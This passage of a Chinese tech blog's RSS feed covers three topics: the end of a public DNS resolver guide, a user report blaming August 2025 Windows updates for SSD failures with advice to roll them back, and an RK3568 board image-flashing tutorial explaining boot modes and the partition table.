114.114.115.115&lt;/pre&gt;&lt;p&gt;适合 &lt;strong&gt;老设备 / 电视 / 路由器&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;四、国际公共 DNS（隐私与安全）&lt;/h2&gt;&lt;h3&gt;Cloudflare DNS（1.1.1.1）&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;综合评价：⭐⭐⭐⭐⭐&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;全球 Anycast 节点&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;明确承诺不记录用户日志&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;隐私友好&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;IPv4&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;1.1.1.1
1.0.0.1&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;DoH&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;https://cloudflare-dns.com/dns-query&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;DoT&lt;/strong&gt;&lt;/p&gt;&lt;pre&gt;one.one.one.one&lt;/pre&gt;&lt;p&gt;👉 &lt;strong&gt;隐私优先用户首选&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h3&gt;Google DNS&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;特点：&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;稳定&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;全球通用&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;国内延迟不稳定&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;pre&gt;8.8.8.8
8.8.4.4&lt;/pre&gt;&lt;hr/&gt;&lt;h3&gt;Quad9 DNS（安全型）&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;特点：&lt;/strong&gt;&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;默认拦截恶意域名&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;适合公司或安全环境&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;pre&gt;9.9.9.9
149.112.112.112&lt;/pre&gt;&lt;hr/&gt;&lt;h2&gt;五、过滤 / 家庭友好型 DNS&lt;/h2&gt;&lt;p&gt;适合儿童环境、广告拦截或基础安全需求：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;OpenDNS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Norton ConnectSafe&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;OneDNS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;SafeDNS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;GreenTeamDNS&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;⚠️ 可能存在误拦截，需按需选择。&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;六、港澳台与地区 DNS（访问就近优化）&lt;/h2&gt;&lt;h3&gt;香港&lt;/h3&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;香港宽频&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;和记环球电讯&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;HKNet&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;PCCW&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;台湾&lt;/h3&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;Quad101（101.101.101.101）&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;中华电信 DNS&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Seednet&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;👉 &lt;strong&gt;访问港澳台站点延迟更低&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;七、教育网与高校 DNS（IPv6 友好）&lt;/h2&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;清华大学：&lt;code inline=&quot;&quot;&gt;101.6.6.6&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;中科大&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;北邮&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;教育网 IPv6 DNS&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;适合 &lt;strong&gt;科研 / IPv6-only 网络&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;八、运营商 DNS 的现实问题&lt;/h2&gt;&lt;p&gt;虽然各省电信 / 联通 / 移动均提供 DNS，但在长期使用中常见：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;DNS 劫持&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;广告注入&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;HTTPS 证书异常&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;隐私不可控&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;👉 &lt;strong&gt;不建议作为长期主 DNS&lt;/strong&gt;&lt;/p&gt;&lt;hr/&gt;&lt;h2&gt;九、推荐组合方案（实用）&lt;/h2&gt;&lt;h3&gt;🇨🇳 国内日常&lt;/h3&gt;&lt;pre&gt;主：223.5.5.5
备：119.29.29.29&lt;/pre&gt;&lt;h3&gt;🔒 隐私优先&lt;/h3&gt;&lt;pre&gt;Cloudflare&amp;nbsp;DoH&lt;/pre&gt;&lt;h3&gt;🧑‍💻 技术用户&lt;/h3&gt;&lt;pre&gt;AliDNS&amp;nbsp;DoH&amp;nbsp;+&amp;nbsp;Cloudflare&amp;nbsp;DoT&lt;/pre&gt;&lt;h3&gt;👨‍👩‍👧 家庭环境&lt;/h3&gt;&lt;pre&gt;114&amp;nbsp;家庭版&amp;nbsp;/&amp;nbsp;OpenDNS&lt;/pre&gt;&lt;hr/&gt;&lt;h2&gt;十、结语&lt;/h2&gt;&lt;p&gt;DNS 并不是“越快越好”，而是：&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;稳定 + 就近 + 安全 + 适合你的网络环境&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;建议你：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;在路由器层统一配置&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;系统层启用 DoH / DoT&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;定期测试延迟和稳定性&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr/&gt;&lt;p&gt;如果你愿意，我还可以继续帮你写：&lt;/p&gt;&lt;ul class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;✅「DNS Bench / NameBench 实测对比」&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅「家庭路由器 DNS 最佳实践」&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅「DoH / DoT 原理深度解析」&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅「广告拦截 + DNS 方案」&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;这里我在四川我测试了成都的IPV6 dns&lt;br/&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2025/12/202512121765508768155306.png&quot; alt=&quot;72e60016-8f54-4750-816d-fb75dc157c98.png&quot;/&gt;&lt;/p&gt;</description><pubDate>Fri, 12 Dec 2025 10:54:34 +0800</pubDate></item><item><title>2025年8月win11和win10系统更新的某些补丁会直接导致炸硬盘 </title><link>https://www.qxhut.cn/?id=50</link><description>&lt;p&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700; color: #444444; font-family: 微软雅黑, Tahoma, &amp;quot;Microsoft Yahei&amp;quot;, Simsun; font-size: 15px; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color:Teal;overflow-wrap: break-word;&quot;&gt;&lt;span style=&quot;font-size:16px;overflow-wrap: break-word;&quot;&gt;已更新情况，不仅会炸ssd，hdd也不能幸免&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;发现这个情况是，我周末开机发现家里电脑怎么硬盘特别的卡，点到直接死机那种，要等好久才能正常&lt;br/&gt;甚至还卡丢盘，重启后恢复，于是在强大的互联网搜索。&lt;/p&gt;&lt;p&gt;我这个SSD盘已经炸掉了！！！！！&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;504&quot; data-height=&quot;322&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508211755742610363839.png&quot; alt=&quot;a70e580c-d79c-4fae-b59a-a7ad7d38f3d1.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700; color: #444444; font-family: 微软雅黑, Tahoma, &amp;quot;Microsoft Yahei&amp;quot;, Simsun; font-size: 15px; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color:Teal;overflow-wrap: break-word;&quot;&gt;&lt;span style=&quot;font-size:16px;overflow-wrap: break-word;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;overflow-wrap: break-word; min-height: 100px; color: rgb(68, 68, 68); font-family: 微软雅黑, Tahoma, &amp;quot;Microsoft Yahei&amp;quot;, Simsun; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; width=&quot;997&quot;&gt;&lt;tbody style=&quot;overflow-wrap: break-word;&quot;&gt;&lt;tr style=&quot;overflow-wrap: break-word;&quot; class=&quot;firstRow&quot;&gt;&lt;td class=&quot;t_f&quot; id=&quot;postmessage_57960004&quot; style=&quot;overflow-wrap: break-word; font-size: 15px;&quot;&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;故障过程&lt;/span&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;如SSD使用率超过60%，并连续写入超过50GB数据(DRAM，带缓存式SSD)，或更少量的数据(HMB非缓存式SSD)，则会导致此SSD在系统中丢失，重启后可被识别或访问，但再次进行大容量连续写入时故障会复现&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;overflow-wrap: break-word;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;某些SSD会引发更严重的故障，分区会被识别为RAW，磁盘处于锁定状态，无法格式化，无法恢复数据，S.M.A.R.T信息无法读取，即使进入WinPE或更换Linux系统，也无法对磁盘分区进行操作，I/O错误，硬件损坏&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;目前明确涉及的系统版本和&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;更新补丁号&lt;/span&gt;，请立即卸载这些补丁或直接回滚，然后暂停系统更新等修复&lt;/span&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;Windows 11:（23H2没躲过啊）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;24H2：&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;KB5063878&lt;/span&gt;&lt;/span&gt;（26100.4946）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;23H2：&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;KB5063875&lt;/span&gt;&lt;/span&gt;（22631.5768 &amp;amp; 22621.5768）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;Windows 10:（Win10也没躲过啊）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;22H2 &amp;amp; 21H2：&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;KB5063709&lt;/span&gt;&lt;/span&gt;（19045.6216 &amp;amp; 19044.6216）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;1809：&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;KB5063877&lt;/span&gt;&lt;/span&gt;（17763.7678）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;1607：&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;KB5063871&lt;/span&gt;&lt;/span&gt;（14393.8330）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;TH1：&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;&lt;span style=&quot;color:Red;overflow-wrap: break-word;&quot;&gt;KB5063889&lt;/span&gt;&lt;/span&gt;（10240.21100）&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;涉及的品牌及主控&lt;/span&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;群联 Phison PS5012-E12&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;英韧 InnoGrit&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;联芸 Maxio&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;铠侠 Kioxia&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;闪迪 SanDisk&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;西数 West Digital&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;SK海力士 SK Hynix&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;&lt;span style=&quot;overflow-wrap: break-word; font-weight: 700;&quot;&gt;未明确涉及的品牌及主控&lt;/span&gt;&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;希捷 Seagate&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;三星 SAMSUNG&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;思德 Solidigm&lt;br style=&quot;overflow-wrap: break-word;&quot;/&gt;慧荣 SMI&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br/&gt;&lt;/p&gt;&lt;p style=&quot;overflow-wrap: break-word; min-height: 100px; color: rgb(68, 68, 68); font-family: 微软雅黑, Tahoma, &amp;quot;Microsoft Yahei&amp;quot;, Simsun; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;img data-width=&quot;566&quot; data-height=&quot;421&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508211755742636439643.png&quot; alt=&quot;dffe3584-3650-400c-968b-6112b45dc37c.png&quot;/&gt;&lt;/p&gt;&lt;p style=&quot;overflow-wrap: break-word; min-height: 100px; color: rgb(68, 68, 68); font-family: 微软雅黑, Tahoma, &amp;quot;Microsoft Yahei&amp;quot;, Simsun; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Thu, 21 Aug 2025 10:01:41 +0800</pubDate></item><item><title>RK3568 Linux驱动学习——SDK烧录</title><link>https://www.qxhut.cn/?id=49</link><description>&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;前言&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Rockchip平台提供了多种镜像烧写方式，如在Windows下通过瑞芯微开发工具烧写、通过SD卡方式烧写、通过FactoryTool工具批量烧写(量产烧写工具、支持USB一拖多烧写)以及在Ubuntu下通过Linux_Upgrade_Tool工具烧写等等。总之，烧写镜像的方式有很多种，可以选择合适的烧写方式进行烧写，将镜像文件烧写至开发板。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;烧写模式介绍&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Rockehip平台硬件设备运行的几种模式如下表所示，只有当设备处于Maskrom以及Loader模式时(必须要通过USB线将开发板的OTG口连接到电脑)，才能够烧写镜像，或对板上镜像进行更新操作。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;模式	是否支持烧录	描述&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Maskrom	支持	Flash在未烧录镜像时，芯片会引导进入Maskrom模式，可以进行初次镜像的烧写；开发调试过程中若遇到无法正常进入Loader模式的情况，也可进入Maskrom模式烧写镜像。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Loader	支持	Loader模式下可以进行镜像烧写、更新升级，可以通过烧写工具单独烧写某一个分区镜像文件,方便调试。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Recovery	不支持	通过引导recovery镜像进入recovery模式，recovery模式主要作用是升级、恢复出厂设置类操作。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Normal Boot	不支持	系统正常启动进入该模式，通过引导rootfs启动，加载rootfs根文件系统，大多数开发都是在这个模式下进行。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;进入Maskrom烧写模式的方法：(先连接电源适配器和OTG)&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板未烧录过镜像，上电之后就会进入到Maskrom模式；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，按住开发板上的UPDATE按键，然后开发发板上电或复位，系统将会进入到Maskrom模式；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，按住开发板上的V-按键(音量-)按键，然后开发板上电或复位，系统将会进入到Maskrom模式；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，在U-Boot命令行下，执行&amp;quot;rbrom&amp;quot;命令进入到Maskrom模式。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;进入Loader烧写模式的方法：(先连接电源适配器和OTG)&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，按住V+按键(音量+)按键，然后开发板上电或复位，系统将会进入到Loader模式；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，在U-Boot命令行下，执行&amp;quot;download&amp;quot;命令进入到Loader模式；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，在Linux系统下，通过串口或ADB执行命令&amp;quot;reboot loader&amp;quot;重启进入到Loader模式；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;开发板烧录过镜像，上电或复位后开发板正常启动进入到系统后，瑞芯微开发工具(也就是RKDevTool工具)会显示&amp;quot;发现一个ADB设备&amp;quot;，然后点击&amp;quot;切换&amp;quot;按钮,进入到Loade模式。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;以上介绍了开发板如何进入到Maskrom或Loader烧写模式，只有进入Maskrom模式或Loader模式后才可进行烧录。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;Windows系统下烧写&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;首先将之前已经编译好的SDK镜像文件(~/rk3568_linux_sdk/rocdev/镜像)从Ubuntu拷贝到Windows下，可以将这个目录命名为rk3568_images，包括了boot.img、MiniLoaderAll.bin、misc.img、oem.img、parameter.txt(分区表文件，不是镜像)、recovery.img、rootfs.img、uboot.img、userdata.img，如下所示：&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;连接好开发板后，打开瑞芯微开发工具，然后按住UPDATE并按下RST按键来进入MASKROM模式：&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;分区表parameter.txt&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;看一下RK平台分区表文件parameter.txt，该文件是一个txt文件。parameter.txt文件描述了开发板的分区表信息，每个分区的名字、分区的起始地址以及分区的大小等信息，来看下它的内容：&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;&amp;nbsp;FIRMWARE_VER:&amp;nbsp;1.0&amp;lt;br&amp;gt;
&amp;nbsp;MACHINE_MODEL:&amp;nbsp;RK3568&amp;lt;br&amp;gt;
&amp;nbsp;MACHINE_ID:&amp;nbsp;007&amp;lt;br&amp;gt;
&amp;nbsp;MANUFACTURER:&amp;nbsp;RK3568&amp;lt;br&amp;gt;
&amp;nbsp;MAGIC:&amp;nbsp;0x5041524B&amp;lt;br&amp;gt;
&amp;nbsp;ATAG:&amp;nbsp;0x00200800&amp;lt;br&amp;gt;
&amp;nbsp;MACHINE:&amp;nbsp;0xffffffff&amp;lt;br&amp;gt;
&amp;nbsp;CHECK_MASK:&amp;nbsp;0x80&amp;lt;br&amp;gt;
&amp;nbsp;PWR_HLD:&amp;nbsp;0,0,A,0,1&amp;lt;br&amp;gt;
&amp;nbsp;TYPE:&amp;nbsp;GPT&amp;lt;br&amp;gt;
&amp;nbsp;CMDLINE:&amp;nbsp;&amp;lt;br&amp;gt;mtdparts=rk29xxnand:0x00002000@0x00004000(uboot),0x00002000@0x00006000(misc),0x00020000@0x00008000(boot),0x00020000@0x00028000(recovery),0x00010000@0x00048000(backup),0x00c00000@0x00058000(rootfs),0x00040000@0x00c58000(oem),-@0x00c98000(userdata:grow)&amp;lt;br&amp;gt;
&amp;nbsp;uuid:rootfs=614e0000-0000-4b53-8000-1d28000054a9&lt;/pre&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;parameter.txt文件中除了分区表信息之外，还包含其它标识，如FIRMWARE_VER、MACHINE_MODEL、MACHINE_ID、MAGIC 等，不做展开。主要来看一下mtdparts标识所定义的分区信息，如下：&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;rk29xxnand:0x00002000@0x00004000(uboot),0x00002000@0x00006000(misc),0x00020000@0x00008000(boot),0x00020000@0x00028000(recovery),0x00010000@0x00048000(backup),0x00c00000@0x00058000(rootfs),0x00040000@0x00c58000(oem),-@0x00c98000(userdata:grow)&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;rk29xxnand是一个标识，为了兼容性，rockchip平台都是用rk29xxnand做标识。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;诸如0x00002000@0x00004000(uboot)、0x00002000@0x00006000(misc)等信息用于定义分区，@符号之前的数值是分区大小，@符号之后的数值是分区的起始位置，括号里面的字符是分区的名字；所有数值的单位都是sector(扇区)，1个sector为512字节。所以由此可知，uboot分区的起始位置为0x4000 sectors位置，大小为0x2000 sectors(4MB)；misc分区的起始位置为0x6000 sectors位置，大小也是0x2000 sectors。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;为了性能，每个分区起始地址需要32KB(64 sectors)对齐，大小也需要32KB的整数倍。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;最后一个分区需要指定grow参数，表示将剩余存储空间全部分配给该分区。&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;每个分区作用如下：&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;img data-width=&quot;674&quot; data-height=&quot;265&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/20250817124909_72663.png&quot; alt=&quot;各分区作用介绍&quot; style=&quot;box-sizing: border-box; outline: none; border: 0px none; margin: 0px; font-synthesis-style: auto; overflow-wrap: break-word; cursor: zoom-in;&quot;/&gt;&lt;br style=&quot;box-sizing: border-box; outline: 0px; font-synthesis-style: auto; overflow-wrap: break-word;&quot;/&gt;&lt;img data-width=&quot;671&quot; data-height=&quot;91&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/20250817124910_66706.png&quot; alt=&quot;各分区作用介绍&quot; style=&quot;box-sizing: border-box; outline: none; border: 0px none; margin: 0px; font-synthesis-style: auto; overflow-wrap: break-word; cursor: zoom-in;&quot;/&gt;&lt;/p&gt;&lt;h3 style=&quot;box-sizing: border-box; outline: 0px; margin: 24px 0px 8px; padding: 0px; font-family: &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, SimHei, Arial, SimSun; font-size: 18px; color: rgb(79, 